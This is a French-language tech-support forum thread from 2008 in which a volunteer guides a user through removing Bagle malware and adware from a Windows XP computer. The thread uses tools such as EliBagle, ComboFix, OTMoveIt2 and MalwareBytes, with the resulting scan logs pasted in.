Ne peut pas démarrer en MSE + installation AntiVir impossible

Bonjour,

Probablement Bagle.

Télécharge Elibagla au bas de cette page.
Il est préférable pour certains antivirus de les désactiver avant d’entâmer cette procédure !

Clique sur le Descargar Elibagla afin de télécharger le fichier, enregistre-le sur ton Bureau.

Lance le en double cliquant dessus.

Vérifie que dans le menu déroulant Unidad, il y ait bien la racine de la racine de la partition où est installé Windows, généralement -> C:\

L'option Eliminar Ficheros Automaticamente doit également être cochée.

Clique sur Explorar pour lancer l'analyse.

Poste le rapport généré en fin fin d'analyse.

Merci de répondre aussi rapidement   !

Alors, j'ai bien fait que tu m'as conseillé, et voici le rapport généré en fin d'analyse :

N° total de Directorios :6801
N° total de Ficheros : 114 162
N° de ficheros Analizados : 11 566
N° de ficheros Infectados : 1
N° de ficheros Eliminados : 1

Tiempo Transcurrido (seg) : 512

Euh, c'est bien ça au moins le rapport généré en fin d'analyse ?  

Il manque du texte mais pas grave.

Fais un clic droit sur ComboFix (de sUBs) et choisis Enregistrer la cible (du lien) sous.

Choisis le Bureau, insère un trait d'union entre Combo et Fix de telle manière à obtenir Combo-Fix.exe, puis choisis Enregistrer.

Désactive temporairement toute protection résidente ! (Antivirus, antispywares..)

Double clique sur ComboFix.exe.

Accepte la licence en cliquant sur Oui.

Lorsque l'opération sera terminée, un rapport apparaîtra. Poste ce rapport dans ta prochaine réponse.

Le rapport se trouve ici : %systemdrive%\ComboFix.txt (%systemdrive% étant la partition où est installée Windows; C:\ en général)

Aide : Comment utiliser ComboFix.

J'ai bien réussi à lancer le logiciel, cependant je ne trouve pas le fichier que tu me demandes  
J'ai un dossier Combo-fix dans C:\ mais aucune trace du rapport "ComboFix.txt"  

Regarde dans le dossier Combo-Fix ? Sinon ressaie ..

Alors, à défaut de ne rien avoir trouver dans le dossier Combo-fix, j'ai cependant trouvé un fichier texte : Bug.txt qui date d'aujourd'hui, à l'heure où j'ai lancé le logiciel.
Interessant ?

Nop,

Peux-tu repasser Elibagla et me poster le rapport?

Sat Jun 21 10:52:26 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Acción Directa):
C:\WINDOWS\SYSTEM32\WINTEMS.EXE --> Eliminado Bagle
C:\WINDOWS\SYSTEM32\BAN_LIST.TXT --> Eliminado Bagle
C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\HIDR.EXE --> Eliminado Bagle
C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\M_HOOK.SYS --> Eliminado Bagle (rootkit)
C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\HIDIRES\ROSA.SYS --> Eliminado Bagle (rootkit)
Por favor, envienos una muestra del fichero
C:\Muestras\HIDR.EXE.Muestra EliBagle v11.50
a "virus@satinfo.es". Gracias.
C:\WINDOWS\SYSTEM32\DRIVERS\HIDR.EXE --> Eliminado Bagle
Por favor, envienos una muestra del fichero
C:\Muestras\SROSA.SYS.Muestra EliBagle v11.50
a "virus@satinfo.es". Gracias.
C:\WINDOWS\SYSTEM32\DRIVERS\SROSA.SYS --> Eliminado Bagle
C:\WINDOWS\SYSTEM32\HLDRRR.EXE --> Eliminado Bagle.dldr
C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\M\FLEC006.EXE --> Eliminado Bagle
C:\DOCUMENTS AND SETTINGS\LAURA\APPLICATION DATA\M\LIST.OCT --> Eliminado Bagle
Eliminada Carpeta "%WinDir%\exefld"
Restaurada Clave: "SafeBoot\Minimal y Network"

Sat Jun 21 10:53:31 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Exploración):
Explorando Unidad C:\
C:\Documents and Settings\papounet\Application Data\m\FLEC006.EXE --> Eliminado Bagle.dldr

Nº Total de Directorios: 6801
Nº Total de Ficheros: 114162
Nº de Ficheros Analizados: 11566
Nº de Ficheros Infectados: 1
Nº de Ficheros Limpiados: 1

Sun Jun 22 18:44:16 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Acción Directa):

Sun Jun 22 18:44:18 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Exploración):
Explorando Unidad C:\
C:\Documents and Settings\Cindie\Application Data\hidires\HIDR.EXE --> Eliminado Bagle
C:\Documents and Settings\Cindie\Application Data\hidires\ROSA.SYS --> Eliminado Bagle (rootkit)
C:\QooBox\Quarantine\C\Documents and Settings\papounet\Application Data\hidires\ROSA.SYS.VIR --> Eliminado Bagle (rootkit)
C:\QooBox\Quarantine\C\Documents and Settings\papounet\Application Data\m\DATA.OCT.VIR --> Eliminado Bagle.dldr

Nº Total de Directorios: 6819
Nº Total de Ficheros: 102197
Nº de Ficheros Analizados: 11813
Nº de Ficheros Infectados: 4
Nº de Ficheros Limpiados: 4

Re,

Redémarre en mode sans échec
/!\ Ne jamais démarrer en mode sans échec via MSCONFIG /!\

Supprime (si présents) sur toutes les sessions :

C:\Documents and Settings\%username%(le nom d'une session)\Application Data\hidires

C:\DOCUMENTS AND SETTINGS\%username%\Application Data\m

Bonjour !

Déjà, excuse moi du retard, j'ai des épreuves orales du bac en ce moment, je n'ai pas eu le temps de m'occuper de mon pc.
Ensuite, chose extraordinaire, et je n'ai toujours pas compris comment c'est possible : le mode sans échec a fonctionné !  
Cependant, les fichiers que tu m'as demandé, sont introuvables ... Il faut bien se connecter sur les sessions autres que celle de l'Administrateur ?
Et sinon, maintenant que le mode sans échec semble fonctionner, est ce que je ne pourrai pas essayer d'installer Antivir ? Je préfère demander avant, on ne sait jamais !
Merci beaucoup en tout cas  

Installe-le en mode sans échec avec prise en charge réseau.
Sinon, avec ça tu vois les dossiers ?

- Affiche les fichiers cachés : Poste de Travail -> Outils -> Options des dossiers -> Afficher les fichers cachés -> Appliquer, OK.
- Affiche les fichiers système : Poste de Travail -> Outils -> Options des dossiers -> Afficher les fichers protégés du système d'exploitation -> Appliquer, OK.

Réussi !
En effet, ces fichiers étaient "cachés", je les ai supprimé sur toutes les sessions où je les trouvais. Merci !
Et maintenant ?  

Passe une nouvelle fois Elibagla et poste moi son rapport  

Tu as installé Antivir ? Fait un scan ?

Thu Jun 26 20:28:45 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Acción Directa):

Thu Jun 26 20:28:48 2008
EliBagle v11.50 (c)2008 S.G.H. / Satinfo S.L. (Actualizado el 20 de Junio del 2008)
----------------------------------------------
Lista de Acciones (por Exploración):
Explorando Unidad C:\

Nº Total de Directorios: 6976
Nº Total de Ficheros: 118900
Nº de Ficheros Analizados: 11880
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0


Je n'ai pas encore installlé Antivir, il m'affichait le message suivant : "close all this applications and reboot Windows" ... Donc je vais essayer en mode sans échec, on ne sait jamais !

ça se présente bien, essaie d'installer AntiVir  

Fais un scan complet puis poste le rapport  

Euh ... Est ce qu'il faut vraiment que je poste TOUT le scan ? Parce qu'il me faudrait un forum à moi tout seule pour poster toutes les pages je crois  

Voici le "compte rendu" fait en mode sans échec, parce qu'en mode normal, impossible de démarrer antivir  

The scan has been done completely.

7155 Scanning directories
217761 Files were scanned
555 viruses and/or unwanted programs were found
1 Files were classified as suspicious:
0 files were deleted
0 files were repaired
555 files were moved to quarantine
0 files were renamed
64 Files cannot be scanned
217206 Files not concerned
2037 Archives were scanned
65 Warnings
555 Notes

Ca fait un peu peur le nombre de "viruses and/or unwanted programs"... Et, j'ai tout "mis en quarantaine", c'était la bonne solution ?
Désolé du retard de la réponse  

[Cependant après le premier scan fait en mode sans échec, Antivir a démarré parfaitement au démarrage normal de Windows, et a trouvé 575 "viruses or/and unwanted programs"... J'ai de l'espoir dans ce pc !   ]

Tu peux me l'envoyer en l'hébergeant sur un site et en me donnant le lien ?
ex : sendspace

http://www.sendspace.com/file/cw9rrm

J'ai suivi ton conseil, et voici le scan d'Avast, sur "sendspace"  
Merci !!

Il y a d'autres infections.

Télécharge Lop S&D.exe ( d%u2019 Eric 71 & Angeldark ) sur ton bureau.

Double-clique dessus pour lancer l'installation

Puis double-clique sur le raccourci Lop S&D présent sur ton bureau

Séléctionne la langue souhaitée , puis choisis l'Option 1 ( Recherche )

Patiente jusqu'à la fin du scan

Poste le rapport généré ( C:\lopR.txt )
(Si le Bureau ne réapparait pas presse Ctrl + Alt + Suppr , Onglet Fichier , Nouvelle tâche , tape explorer.exe et valide)

http://www.sendspace.com/file/kp10tj

J'ai réutilisé sendspace  

Re,

Sélectionne entièrement l'encadré ci-dessous , puis clique droit Copier



Relance Lop S&D

Choisis cette fois ci l'Option 4 (LopScript)

Une page blanche va s'ouvrir , clique droit dessus et choisis Coller

Ferme la page , il te sera demandé de l'enregistrer , clique sur [Enregistrer]

Ne ferme pas la fenêtre lors de la suppression !

Poste le rapport généré (C:\lopR.txt)

http://www.sendspace.com/file/levbin

J'ai suivi les instructions, en espérant que tout ait marché  

Tu peux les poster directement sur le forum   Quand ce n'est pas trop long.

Télécharger OTMoveIt2 par OldTimer.

Enregistrer ce fichier sur le Bureau.

Faire un double clic sur OTMoveIt2.exe pour lancer l'exécution de l'outil. (Note: Si vous utilisez Vista, faire un clic droit sur le fichier puis choisir Exécuter en tant qu'administrateur).

Copier les lignes de la zone "Code" ci-dessous en les sélectionnant TOUTES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier):

C:\Program Files\GamesBar
C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports
C:\DOCUME~1\ALLUSE~1\APPLIC~1\settings blue film frag
C:\DOCUME~1\ALLUSE~1\APPLIC~1\global dead funk does
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar

Retourner dans la fenêtre de OTMoveIt2, faire un clic droit dans la zone "Paste Standard List of Files/Folders to Move" (sous la barre bleu clair) puis choisir Coller.

Cliquer sur le bouton rouge Moveit!.

Copier tout ce qui se trouve dans la zone Results (sous la barre verte) en sélectionnant TOUTES LES LIGNES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier), et coller ces résulats en réponse sur le forum.

Fermer OTMoveIt2

Note: Si un fichier ou un dossier ne peut pas être déplacé immédiatement, un redémarrage sera peut-être nécessaire afin de terminer le processus de déplacement. Si le redémarrage de la machine vous est demandé, choisir Oui/Yes. Dans ce cas, après le redémarrage, ouvrir le Bloc-notes (Démarrer->Tous les programmes->Accessoires->Bloc-notes), cliquer sur Fichier->Ouvrir, dans la zone "Nom du fichier" taper *.log et appuyer sur la touche Entrée, naviguer jusqu'au dossier C:\_OTMoveIt\MovedFiles, puis ouvrir le fichier .log le plus récent; ensuite faire un copier/coller du contenu de ce document en réponse sur le forum.

Si tu obtiens un message comme quoi le rapport ne peut pas être créé, copie/colle ce qui apparaît dans la colonne droite de l’outil.

Voilà ce que ça donne dans la zone Results :

C:\Program Files\GamesBar moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR\NewCfg moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR\downfile moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\VMNTOOLBAR moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\res2 moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\report moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\dwld moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs\db moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports\cs moved successfully.
C:\DOCUME~1\papounet\APPLIC~1\ShopperReports moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\report moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Laura moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Documents and Settings moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\ShopperReports moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\res2 moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\report moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Laura moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\dwld moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Documents and Settings moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\db moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs\Application Data moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\cs moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports\Application Data moved successfully.
C:\DOCUME~1\Laura\APPLIC~1\ShopperReports moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\settings blue film frag moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\global dead funk does moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-21-00-04-32 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-20-22-18-17 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-20-19-23-14 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-19-17-38-31 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-19-17-38-30 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-18-23-28-51 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-16-21-24-48 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-16-11-10-55 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-13 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-07 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-05-03 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-04-23 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-14-23-04-11 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-13-23-49-27 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-20-23-54 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-21 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-14 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-10-19-41-13 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-45-24 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-31 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-18 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-43-16 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-41-11 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-36-32 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-21-33-34 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-05-18-05-25 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-06-02-21-56-52 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-31-14-05-00 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-31-09-41-52 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-52-46 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-52-43 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-46-44 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-44 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-38 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-29-21-33-35 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-28-20-21-32 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-31-30 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-31-27 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-27-21-28-29 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-24-18-58-30 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-24-18-58-22 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-18-16-16-03 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-14-19-03-49 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-12-21-34-17 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-12-21-33-49 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-11-23-31-30 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-10-23-15-10 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-05-02-22-58-40 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-30-22-15-19 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-28-19-05-52 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-26-07-52-21 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-17-22-39-36 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-15-20-07-07 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-14-18-58-36 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-12-10-20-59 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-04-02-21-09-37 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-30-19-13-49 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-48 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-43 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-29-10-18-36 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-25-12-16-26 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-12-20-00-26 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-11-19-37-15 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-09-13-06-31 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-07-21-27-37 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-03-03-14-47-03 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-29-22-43-28 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-26-16-53-22 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-26-12-58-11 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-14-18-27-32 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-08-21-11-44 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-07-20-59-09 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-04-20-47-35 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-02-18-00-47 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-02-01-20-01-38 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar\08-01-28-14-50-53 moved successfully.
C:\DOCUME~1\ALLUSE~1\APPLIC~1\GamesBar moved successfully.

OTMoveIt2 by OldTimer - Version 1.0.4.3 log created on 07012008_131126

Re,

Peux-tu maintenant relancer ComboFix et me fournir un rapport ?

http://www.sendspace.com/file/nkvw0k

Hum ... Il y a quand même 221 pages de scan, c'est pas un peu énorme ?
Par contre, je crois avoir oublier un point essentiel dans ce logiciel   Est ce qu'il est primordial d'installer la console de récupération ? Je demande, parce qu'en début de scan il y ait marqué "ATTENTION PAS DE CONSOLE DE RECUPERATION"... Ai-je fait une boulette ?

Oula, c'est parce qu'il n'y avait pas qu'une session d'infectée  

Pour la console, c'est conseillé, mais tu n'es pas obligé.

Désactive toute protection résidente ( antivirus...) ! <------- Pense-y !

Copie le texte se situant dans le cadre ci-dessous : ( Ctrl + C )



=> Ouvre le Bloc Notes : Démarrer > Tous les programmes > Accessoires > Bloc notes

- Colles y le texte (CTRL + V)
- Enregistre ce fichier dans : Bureau
- Nom du fichier : CFScript
- Type du fichier : tous les fichiers !!
- Clique sur Enregistrer
- Quitte le Bloc Notes

Fais un glisser/déposer de ce fichier CFScript sur le fichier ComboFix.exe comme sur la capture :



* Cela va relancer Combofix : au message qui apparaît ( Type 1 to continue, or 2 to abort), tape 1 puis valide.
* Patiente le temps du scan. Le bureau va disparaître à plusieurs reprises : c'est normal !
* Ne touche à rien tant que le scan n'est pas terminé.
* Une fois le scan achevé, un rapport va s'afficher : Copie/Colle son contenue sur le forum.
Si le fichier ne s'ouvre pas, il se trouve ici : C:\ComboFix.txt
* Poste un nouveau rapport hijackthis.

http://www.sendspace.com/file/e6xbf8

Je ne sais pas si c'est le bon fichier par contre ... il fait 293 pages lui ! Hum ...
Et y'a un petit soucis : Aucun message n'est apparu quand ComboFix s'est relancé grâce au "glisser/déposer" avec le fichier CFScript ... ComboFix s'est juste lancé comme à son habitude !
Ensuite, une autre question ( sinon c'est pas drôle...  ) J'ai bien désactivé Antivir quand j'ai lancé ComboFix, cependant quand ComboFix redémarre Windows, Antivir se réactive... Est ce que ça peut empêcher ComboFix de fonctionner "normalement" ?

Et ... c'est quoi un rapport hijackthis ? :S

Re,

On dirait qu'il y a quelque chose qui relance l'infection.

Fais un scan en ligne Kaspersky avec Internet Explorer :

Clique sur

Clique maintenant sur J'accepte.

Valide l'installation d'un ou de plusieurs ActiveX si c'est nécessaire.

Patiente pendant l'installation des Mises à jour.

Choisis par la suite l'analyse du Poste de travail

Sauvegarde puis colle le rapport généré en fin d'analyse.

AIDE : Tuto sur le scan en ligne

NOTE : Si tu reçois le message "La licence de Kaspersky On-line Scanner est périmée", va dans Ajout/Suppression de programmes puis désinstalle On-Line Scanner, reconnecte toi sur le site de Kaspersky pour retenter le scan en ligne.


*********

Télécharge MalwareByte's Anti-Malware sur ton Bureau.
Installe-le en double-cliquant sur le fichier Download_mbam-setup.exe.

Une fois l'installation et la mise à jour effectuées, redémarre en mode sans échec.
AIDE : Redémarrer en mode sans échec

Exécute maintenant MalwareByte's Anti-Malware. Si cela n'est pas déjà fait, sélectionne "Exécuter un examen complet".

Afin de lancer la recherche, clic sur"Rechercher".

Une fois le scan terminé, une fenêtre s'ouvre, clic sur OK. Deux possibilités s'offrent à toi :
-- si le programme n'a rien trouvé, appuie sur OK. Un rapport va apparaître, ferme-le.
-- si des infections sont présentes, clic sur "Afficher les résultats" puis sur "Supprimer la sélection". Enregistre le rapport sur ton Bureau afin de le poster dans ta prochaine réponse.
[#ff0000]REMARQUE : Si MalwareByte's Anti-Malware a besoin de redémarrer pour terminer la suppression, accepte en cliquant sur Ok.[/#f]

AIDE : Tuto en images sur MBAM

Rapport Kapersky : ( je bat mon record, plus de 400 pages là ...:/ )
http://www.sendspace.com/file/f8o7lh

Rapport de MalwareByte's Anti-Malware : ( Il a détecté des trucs, donc j'ai supprimé la selection comme tu me l'as indiqué ! )
http://www.sendspace.com/file/g026v7

Merci de toutes ces explications en tout cas  

Re,

Supprime C:\Qoobox

Télécharger OTMoveIt2 par OldTimer.

Enregistrer ce fichier sur le Bureau.

Faire un double clic sur OTMoveIt2.exe pour lancer l'exécution de l'outil. (Note: Si vous utilisez Vista, faire un clic droit sur le fichier puis choisir Exécuter en tant qu'administrateur).

Copier les lignes de la zone "Code" ci-dessous en les sélectionnant TOUTES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier):

C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Télécharger des logiciels.exe
C:\Documents and Settings\Guillaume\Application Data\HbTools
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat

Retourner dans la fenêtre de OTMoveIt2, faire un clic droit dans la zone "Paste Standard List of Files/Folders to Move" (sous la barre bleu clair) puis choisir Coller.

Cliquer sur le bouton rouge Moveit!.

Copier tout ce qui se trouve dans la zone Results (sous la barre verte) en sélectionnant TOUTES LES LIGNES puis en appuyant simultanément sur les touches CTRL et C (ou, après les avoir sélectionnées, en faisant un clic droit puis en choisissant Copier), et coller ces résulats en réponse sur le forum.

Fermer OTMoveIt2

Note: Si un fichier ou un dossier ne peut pas être déplacé immédiatement, un redémarrage sera peut-être nécessaire afin de terminer le processus de déplacement. Si le redémarrage de la machine vous est demandé, choisir Oui/Yes. Dans ce cas, après le redémarrage, ouvrir le Bloc-notes (Démarrer->Tous les programmes->Accessoires->Bloc-notes), cliquer sur Fichier->Ouvrir, dans la zone "Nom du fichier" taper *.log et appuyer sur la touche Entrée, naviguer jusqu'au dossier C:\_OTMoveIt\MovedFiles, puis ouvrir le fichier .log le plus récent; ensuite faire un copier/coller du contenu de ce document en réponse sur le forum.

Si tu obtiens un message comme quoi le rapport ne peut pas être créé, copie/colle ce qui apparaît dans la colonne droite de l’outil.

**************

Fais démarrer ton ordinateur en mode sans échec.
Supprime les différents rapports créés par ComboFix sur ton ordinateur ( C:\Combofix?.txt) Le ? représentant un nombre ou rien.
Repasse ComboFix sans script et poste moi son rapport -de préférence sur le forum-

Results dans OTmoveIT2 :
Démarrer\Programmes\Télécharger des logiciels.exe
C:\Documents and Settings\Guillaume\Application Data\HbTools
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat
C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat


Rapport ComboFix : ( Et et, première fois que le fichier se trouve bien dans C:\ComboFix.txt net progrès ! )

ComboFix 08-06-30.2 - Laura 2008-07-04 10:19:06.4 - NTFSx86 MINIMAL
Microsoft Windows XP Édition familiale 5.1.2600.2.1252.1.1036.18.769 [GMT 2:00]
Endroit: C:\Documents and Settings\Laura\Bureau\combofix.exe

AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !!
.

((((((((((((((((((((((((((((( Fichiers créés 2008-06-04 to 2008-07-04 ))))))))))))))))))))))))))))))))))))
.

2008-07-04 10:10 . 2008-07-04 10:10 <REP> d-------- C:\_OTMoveIt
2008-07-03 14:35 . 2008-07-03 14:35 <REP> d-------- C:\Documents and Settings\Laura\Application Data\Malwarebytes
2008-07-03 14:34 . 2008-07-03 14:35 <REP> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-07-03 14:34 . 2008-07-03 14:34 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
